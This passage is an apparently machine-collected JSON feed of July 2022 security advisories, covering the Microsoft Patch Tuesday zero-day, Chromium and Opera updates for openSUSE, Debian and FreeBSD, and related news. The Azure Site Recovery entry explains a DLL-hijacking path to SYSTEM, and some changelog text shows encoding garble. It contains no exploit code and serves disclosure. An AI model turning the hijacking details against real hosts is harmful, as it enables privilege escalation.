you\u2019re using Microsoft Edge (Chromium-based), make sure it gets updated as soon as possible.\n\n## Azure Site Recovery RCEs and EOPs\n\nThere are also a lot of vulnerabilities in Azure Site Recovery in July Patch Tuesday. Both EoPs and RCEs, and quite a few with non-public exploits of the POC maturity level. According to the description "Site Recovery is a native disaster recovery as a service (DRaaS)", it would seem that this should be patched by Microsoft themselves. But in fact, there is a Microsoft Azure Site Recovery suite installed on the hosts, and at least some of the vulnerabilities were found in it. \n\nLet's see, for example, **Elevation of Privilege** in Azure Site Recovery (CVE-2022-33675). The vulnerability was discovered and [reported to Microsoft by Tenable researcher Jimi Sebree](<https://www.tenable.com/security/research/tra-2022-26>). The Microsoft Azure Site Recovery suite contains a DLL hijacking flaw that allows for privilege escalation from any low privileged user to SYSTEM. \n\nIncorrect permissions on the service\u2019s executable directory (E:\\Program Files (x86)\\Microsoft Azure Site Recovery\\home\\svsystems\\transport\\\\) allow new files to be created by any user. The service launched from this directory runs automatically and with SYSTEM privileges and attempts to load several DLLs from this directory. This allows for a DLL hijacking/planting attack via several libraries that are attempted to be loaded from this location when the service is launched. Existing deployments should ensure that the Microsoft-supplied patches have been appropriately applied.\n\nThe full Vulristics report is available here: [ms_patch_tuesday_july2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-23T08:34:29", "type": "avleonov", "title": "Microsoft Patch Tuesday July 2022: propaganda report, CSRSS EoP, RPC RCE, Edge, Azure Site Recovery", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22038", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-33675"], "modified": "2022-07-23T08:34:29", "id": "AVLEONOV:B87691B304EF70215B926F66B871260A", "href": "https://avleonov.com/2022/07/23/microsoft-patch-tuesday-july-2022-propaganda-report-csrss-eop-rpc-rce-edge-azure-site-recovery/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-11-09T21:00:13", "description": "An update that fixes three vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n Chromium 103.0.5060.114 (boo#1201216)\n\n * CVE-2022-2294: Heap buffer overflow in WebRTC\n * CVE-2022-2295: Type Confusion in V8\n * CVE-2022-2296: Use after free in Chrome OS Shell\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP4:\n\n zypper in -t patch openSUSE-2022-10055=1\n\n - openSUSE Backports SLE-15-SP3:\n\n zypper in -t patch openSUSE-2022-10055=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T00:00:00", "type": "suse", "title": "Security update for chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2022-07-13T00:00:00", "id": "OPENSUSE-SU-2022:10055-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/TJ5LTW7LEHL5JFGRUX2J7S5CEEACPAUP/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-09T22:08:22", "description": "An update that fixes 9 vulnerabilities is now available.\n\nDescription:\n\n This update for opera fixes the following issues:\n\n Opera was updated to 89.0.4447.71\n\n - CHR-8957 Update chromium on desktop-stable-103-4447 to 103.0.5060.134\n - DNA-100492 authPrivate.storeCredentials should work with running auth\n session\n - DNA-100649 \ufffd\ufffd\ufffdSign out\ufffd\ufffd\ufffd from settings doesn\ufffd\ufffd\ufffdt also sign out from\n auth\n - DNA-100653 VPN Badge popup \ufffd\ufffd\ufffd not working well with different page\n zoom being set in browser settings\n - DNA-100712 Wrong spacing on text to reset sync passphrase in settings\n - DNA-100799 VPN icon is \ufffd\ufffd\ufffdpro\ufffd\ufffd\ufffd on disconnected\n - DNA-100841 Remove Get Subscription and Get button from VPN pro settings\n - DNA-100883 Update missing translations from chromium\n - DNA-100899 Translation error in Turkish\n - DNA-100912 Unable to select pinboards when sync everything is enabled\n - DNA-100959 Use after move RecentSearchProvider::ExecuteWithDB\n - DNA-100960 Use after move\n CountryBlacklistServiceImpl::DownloadCountryBlacklist\n - DNA-100961 Use after move\n CategorizationDataCollection::Iterator::Iterator\n - DNA-100989 Crash at\n opera::EasyFileButton::SetThumbnail(gfx::ImageSkia const&)\n\n - The update to chromium 103.0.5060.134 fixes following issues:\n CVE-2022-2163, CVE-2022-2477, CVE-2022-2478, CVE-2022-2479\n CVE-2022-2480, CVE-2022-2481\n\n - Update to 89.0.4447.51\n\n - DNA-99538 Typed content of address bar shared between tabs\n - DNA-100418 Set 360 so as search engine in China\n - DNA-100629 Launch Auth login when enabling sync while logged in\n - DNA-100776 Popup is too long if there are no services available\n\n - Update to 89.0.4447.48\n\n - CHR-8940 Update chromium on desktop-stable-103-4447 to 103.0.5060.114\n - DNA-100247 Make it possible to display hint when tab scrolling gets\n triggered\n - DNA-100482 Shopping corner icon availability\n - DNA-100575 Add unique IDs to all web element in opera account popup\n - DNA-100625 Opera account popup appears too high on Linux\n - DNA-100627 Enable #snap-from-panel on all stream\n - DNA-100636 DCHECK at suggestion_item.cc(484)\n - DNA-100685 Fix crash when attaching to tab strip scroll buttons\n - DNA-100693 Enable Sticky Site sidebar item to have notification bubble\n - DNA-100698 [AdBlock] Unhandled Disconnect list category:\n \"emailaggressive\"\n - DNA-100716 Misstype Settings \"Enhanced address bar\"\n - DNA-100732 Fix & escaping in translated strings\n - DNA-100759 Crash when loading personal news in private window\n\n - The update to chromium 103.0.5060.114 fixes following issues:\n CVE-2022-2294, CVE-2022-2295, CVE-2022-2296\n\n - Update to 89.0.4447.38\n\n - DNA-100283 Translations for O89\n\n - Complete Opera 89.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-89/\n\n - Changes in 89.0.4447.37\n\n - CHR-8929 Update chromium on desktop-stable-103-4447 to 103.0.5060.66\n - DNA-99780 Crash at zmq::zmq_abort(char const*)\n - DNA-100377 New opera account popup doesn\ufffd\ufffd\ufffdt open on Linux\n - DNA-100589 Crash at base::internal::Invoker<T>::RunOnce\n (base::internal::BindStateBase*, scoped_refptr<T>&&)\n - DNA-100607 Sync \ufffd\ufffd\ufffdSign in\ufffd\ufffd\ufffd button doesn\ufffd\ufffd\ufffdt work with Opera Account\n popup\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.4:NonFree:\n\n zypper in -t patch openSUSE-2022-10088=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "suse", "title": "Security update for opera (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2022-2163", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296", "CVE-2022-2477", "CVE-2022-2478", "CVE-2022-2479", "CVE-2022-2480", "CVE-2022-2481"], "modified": "2022-08-16T00:00:00", "id": "OPENSUSE-SU-2022:10088-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/C6CFP4ALDNAUZ4ZAOFXUPGCPSV42N26M/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-09T22:08:22", "description": "An update that fixes 9 vulnerabilities is now available.\n\nDescription:\n\n This update for opera fixes the following issues:\n\n opera was updated to 89.0.4447.71\n\n - CHR-8957 Update chromium on desktop-stable-103-4447 to 103.0.5060.134\n - DNA-100492 authPrivate.storeCredentials should work with running auth\n session\n - DNA-100649 \ufffd\ufffd\ufffdSign out\ufffd\ufffd\ufffd from settings doesn\ufffd\ufffd\ufffdt also sign out from\n auth\n - DNA-100653 VPN Badge popup \ufffd\ufffd\ufffd not working well with different page\n zoom being set in browser settings\n - DNA-100712 Wrong spacing on text to reset sync passphrase in settings\n - DNA-100799 VPN icon is \ufffd\ufffd\ufffdpro\ufffd\ufffd\ufffd on disconnected\n - DNA-100841 Remove Get Subscription and Get button from VPN pro settings\n - DNA-100883 Update missing translations from chromium\n - DNA-100899 Translation error in Turkish\n - DNA-100912 Unable to select pinboards when sync everything is enabled\n - DNA-100959 Use after move RecentSearchProvider::ExecuteWithDB\n - DNA-100960 Use after move\n CountryBlacklistServiceImpl::DownloadCountryBlacklist\n - DNA-100961 Use after move\n CategorizationDataCollection::Iterator::Iterator\n - DNA-100989 Crash at\n opera::EasyFileButton::SetThumbnail(gfx::ImageSkia const&)\n\n - The update to chromium 103.0.5060.134 fixes following issues:\n CVE-2022-2163, CVE-2022-2477, CVE-2022-2478, CVE-2022-2479\n CVE-2022-2480, CVE-2022-2481\n\n opera was updated to 89.0.4447.51\n\n - DNA-99538 Typed content of address bar shared between tabs\n - DNA-100418 Set 360 so as search engine in China\n - DNA-100629 Launch Auth login when enabling sync while logged in\n - DNA-100776 Popup is too long if there are no services available\n\n opera was updated to 89.0.4447.48\n\n - CHR-8940 Update chromium on desktop-stable-103-4447 to 103.0.5060.114\n - DNA-100247 Make it possible to display hint when tab scrolling gets\n triggered\n - DNA-100482 Shopping corner icon availability\n - DNA-100575 Add unique IDs to all web element in opera account popup\n - DNA-100625 Opera account popup appears too high on Linux\n - DNA-100627 Enable #snap-from-panel on all stream\n - DNA-100636 DCHECK at suggestion_item.cc(484)\n - DNA-100685 Fix crash when attaching to tab strip scroll buttons\n - DNA-100693 Enable Sticky Site sidebar item to have notification bubble\n - DNA-100698 [AdBlock] Unhandled Disconnect list category:\n \"emailaggressive\"\n - DNA-100716 Misstype Settings \"Enhanced address bar\"\n - DNA-100732 Fix & escaping in translated strings\n - DNA-100759 Crash when loading personal news in private window\n\n - The update to chromium 103.0.5060.114 fixes following issues:\n CVE-2022-2294, CVE-2022-2295, CVE-2022-2296\n\n opera was updated to 89.0.4447.38\n\n - DNA-100283 Translations for O89\n\n - Complete Opera 89.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-89/\n\n opera was updated to 89.0.4447.37\n\n - CHR-8929 Update chromium on desktop-stable-103-4447 to 103.0.5060.66\n - DNA-99780 Crash at zmq::zmq_abort(char const*)\n - DNA-100377 New opera account popup doesn\ufffd\ufffd\ufffdt open on Linux\n - DNA-100589 Crash at base::internal::Invoker<T>::RunOnce\n (base::internal::BindStateBase*, scoped_refptr<T>&&)\n - DNA-100607 Sync \ufffd\ufffd\ufffdSign in\ufffd\ufffd\ufffd button doesn\ufffd\ufffd\ufffdt work with Opera Account\n popup\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:NonFree:\n\n zypper in -t patch openSUSE-2022-10087=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "suse", "title": "Security update for opera (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2022-2163", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296", "CVE-2022-2477", "CVE-2022-2478", "CVE-2022-2479", "CVE-2022-2480", "CVE-2022-2481"], "modified": "2022-08-16T00:00:00", "id": "OPENSUSE-SU-2022:10087-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/SBC3VMU74SRNP6PNL6PMNTJCIFN32DXR/", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2022-08-10T07:21:05", "description": "\nMultiple security issues were discovered in Chromium, which could result\nin the execution of arbitrary code, denial of service or information\ndisclosure.\n\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 103.0.5060.114-1~deb11u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-07-11T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-2296", "CVE-2022-2294", "CVE-2022-2295"], "modified": "2022-08-10T07:21:00", "id": "OSV:DSA-5180-1", "href": "https://osv.dev/vulnerability/DSA-5180-1", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2023-12-07T11:52:06", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5180-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJuly 11, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2022-2294 CVE-2022-2295 CVE-2022-2296\n\nMultiple security issues were discovered in Chromium, which could result\nin the execution of arbitrary code, denial of service or information\ndisclosure.\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 103.0.5060.114-1~deb11u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-11T17:47:32", "type": "debian", "title": "[SECURITY] [DSA 5180-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2022-07-11T17:47:32", "id": "DEBIAN:DSA-5180-1:E631C", "href": "https://lists.debian.org/debian-security-announce/2022/msg00148.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-12-06T15:47:18", "description": "\n\nChrome Releases reports:\n\nThis release contains 4 security fixes, including:\n\n[1341043] High CVE-2022-2294: Heap buffer overflow in WebRTC. Reported by Jan Vojtesek from the Avast Threat Intelligence team on 2022-07-01\n[1336869] High CVE-2022-2295: Type Confusion in V8. Reported by avaue and Buff3tts at S.S.L. on 2022-06-16\n[1327087] High CVE-2022-2296: Use after free in Chrome OS Shell. Reported by Khalil Zhani on 2022-05-19\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-04T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2022-07-04T00:00:00", "id": "744EC9D7-FE0F-11EC-BCD2-3065EC8FD3EC", "href": "https://vuxml.freebsd.org/freebsd/744ec9d7-fe0f-11ec-bcd2-3065ec8fd3ec.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-07-13T05:57:21", "description": "[![Microsoft](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMMVV60incjQemAA8K9lAWSescsqjqG2a3UdVc4GiCMmXBd6175xW7cZiTJONSGUB1N9s-MMZARqaZP7h-OdKy4jUdvvT_H-aPCCLF9TKLu1S1Xcj8NZh673Hir7VOwNMNdOLjEU6LSXewzYkJXyX0Y0dpIn7L1WK7IuD61f1iG8uajyHoBwST8KVh/s728-e1000/windows-update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMMVV60incjQemAA8K9lAWSescsqjqG2a3UdVc4GiCMmXBd6175xW7cZiTJONSGUB1N9s-MMZARqaZP7h-OdKy4jUdvvT_H-aPCCLF9TKLu1S1Xcj8NZh673Hir7VOwNMNdOLjEU6LSXewzYkJXyX0Y0dpIn7L1WK7IuD61f1iG8uajyHoBwST8KVh/s728-e100/windows-update.jpg>)\n\nMicrosoft released its monthly round of Patch Tuesday updates to address [84 new security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild.\n\nOf the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are [two other bugs](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser, one of which plugs another [zero-day flaw](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) that Google disclosed as being actively exploited in real-world attacks.\n\nTop of the list of this month's updates is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) (CVSS score: 7.8), a case of privilege escalation in the Windows Client Server Runtime Subsystem ([CSRSS](<https://en.wikipedia.org/wiki/Client/Server_Runtime_Subsystem>)) that could be abused by an attacker to gain SYSTEM permissions.\n\n\"With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools,\" Kev Breen, director of cyber threat research at Immersive Labs, told The Hacker News. \"With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly.\"\n\nVery little is known about the nature and scale of the attacks other than an \"Exploitation Detected\" assessment from Microsoft. The company's Threat Intelligence Center (MSTIC) and Security Response Center (MSRC) have been credited with reporting the flaw.\n\nBesides CVE-2022-22047, two more elevation of privilege flaws have been fixed in the same component \u2014 [CVE-2022-22026](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22026>) (CVSS score: 8.8) and [CVE-2022-22049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22049>) (CVSS score: 7.8) \u2014 that were reported by Google Project Zero researcher Sergei Glazunov.\n\n\"A locally authenticated attacker could send specially crafted data to the local CSRSS service to elevate their privileges from [AppContainer](<https://docs.microsoft.com/windows/win32/secauthz/appcontainer-isolation>) to SYSTEM,\" Microsoft said in an advisory for CVE-2022-22026.\n\n\"Because the AppContainer environment is considered a defensible security boundary, any process that is able to bypass the boundary is considered a change in Scope. The attacker could then execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\"\n\nAlso remediated by Microsoft include a number of remote code execution bugs in Windows Network File System ([CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>)), Windows Graphics ([CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>)), Remote Procedure Call Runtime ([CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>)), and Windows Shell ([CVE-2022-30222](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30222>)).\n\nThe update further stands out for patching as many as 32 issues in the [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/site-recovery-overview>) business continuity service. Two of these flaws are related to remote code execution and the remaining 30 concern privilege escalation.\n\n\"Successful exploitation [...] requires an attacker to compromise admin credentials to one of the VMs associated with the configuration server,\" the company said, adding the flaws do not \"allow disclosure of any confidential information, but could allow an attacker to modify data that could result in the service being unavailable.\"\n\nOn top of that, Microsoft's July update also contains fixes for four privilege escalation vulnerabilities in the Windows Print Spooler module ([CVE-2022-22022](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>)) after a [brief respite in June 2022](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), underscoring what appears to be a never-ending stream of flaws plaguing the technology.\n\nRounding off the Patch Tuesday updates are two notable fixes for tampering vulnerabilities in the Windows Server Service ([CVE-2022-30216](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30216>)) and Microsoft Defender for Endpoint ([CVE-2022-33637](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33637>)) and three denial-of-service (DoS) flaws in Internet Information Services ([CVE-2022-22025](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22025>) and [CVE-2022-22040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22040>)) and Security Account Manager ([CVE-2022-30208](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30208>)).\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-07-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/date/20220712>)\n * [Cisco](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Fortinet](<https://thehackernews.com/2022/07/cisco-and-fortinet-release-security.html>)\n * [GitLab](<https://about.gitlab.com/releases/2022/07/04/gitlab-15-1-2-released/>)\n * [Google Chrome](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/July-2022>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/july-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-13T04:15:00", "type": "thn", "title": "Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22022", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30216", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30226", "CVE-2022-33637"], "modified": "2022-07-13T05:36:49", "id": "THN:8C2FBC83F6EC62900F1887F00903447F", "href": "https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-01T11:56:12", "description": "[![Microsoft Office Zero-Day Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiUNLbMQKFGJkk_0MuvTZUsbdZk7Mwzi1ubRnWBoCLxeBkICJ8W6xX9SHPsYas7bLDtqj4wO1lZsmsxuPuAxkocOzNUvBMbOmM2yJIGg2t7CnMv5yAaUiSHpTbdt9nsHappGPYR_oG1nild6RLvcMvaILplweROkw7HFZp7QvCAE_V31Ku-G5wnnnZq/s728-e1000/office.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiUNLbMQKFGJkk_0MuvTZUsbdZk7Mwzi1ubRnWBoCLxeBkICJ8W6xX9SHPsYas7bLDtqj4wO1lZsmsxuPuAxkocOzNUvBMbOmM2yJIGg2t7CnMv5yAaUiSHpTbdt9nsHappGPYR_oG1nild6RLvcMvaILplweROkw7HFZp7QvCAE_V31Ku-G5wnnnZq/s728-e100/office.jpg>)\n\nAn advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new [zero-day flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in Microsoft Office to achieve 